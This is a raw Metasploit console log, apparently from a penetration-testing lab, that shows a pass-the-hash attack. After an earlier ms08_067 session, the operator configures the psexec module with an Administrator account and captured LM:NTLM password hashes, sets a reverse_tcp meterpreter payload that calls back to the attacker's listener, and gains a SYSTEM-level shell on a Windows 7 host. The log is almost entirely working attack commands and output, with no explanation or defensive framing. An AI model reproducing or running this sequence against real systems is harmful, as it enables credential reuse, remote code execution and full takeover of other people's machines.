- meterpreter > background
- msf exploit(ms08_067_netapi) > back
- msf > use exploit/windows/smb/psexec
- msf exploit(psexec) > set RHOST 192.168.1.126
- RHOST => 192.168.1.126
- msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(psexec) > set LHOST 192.168.1.140
- LHOST => 192.168.1.140
- msf exploit(psexec) > set LPORT 80
- LPORT => 80
- msf exploit(psexec) > set SMBUser Administrator
- SMBUser => Administrator
- msf exploit(psexec) > set SMBPass e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc
- SMBPass => e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc
- msf exploit(psexec) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST 192.168.1.126 yes The target address
- RPORT 445 yes Set the SMB service port
- SMBDomain WORKGROUP no The Windows domain to use for authentication
- SMBPass e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc no The password for the specified username
- SMBUser Administrator no The username to authenticate as
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process
- LHOST 192.168.1.140 yes The listen address
- LPORT 80 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(psexec) > exploit -j -z
- [*] Exploit running as background job.
- [*] Started reverse handler on 192.168.1.140:80
- [*] Connecting to the server...
- msf exploit(psexec) > [*] Authenticating as user 'Administrator'...
- [*] Uploading payload...
- [*] Created \CVoJSded.exe...
- [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
- [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
- [*] Obtaining a service manager handle...
- [*] Creating a new service (PkyMibtg - "MhHUOHCe")...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [*] Removing the service...
- [*] Closing service handle...
- [*] Deleting \CVoJSded.exe...
- [*] Sending stage (748544 bytes) to 192.168.1.126
- [*] Meterpreter session 2 opened (192.168.1.140:80 -> 192.168.1.126:49356) at Sat Sep 18 11:09:55 +0200 2010
- sessions -i 2
- [*] Starting interaction with 2...
- meterpreter > sysinfo
- Computer: P0002
- OS : Windows 7 (Build 7600, ).
- Arch : x86
- Language: en_US
- meterpreter > getuid
- Server username: NT AUTHORITY\SYSTEM
- meterpreter >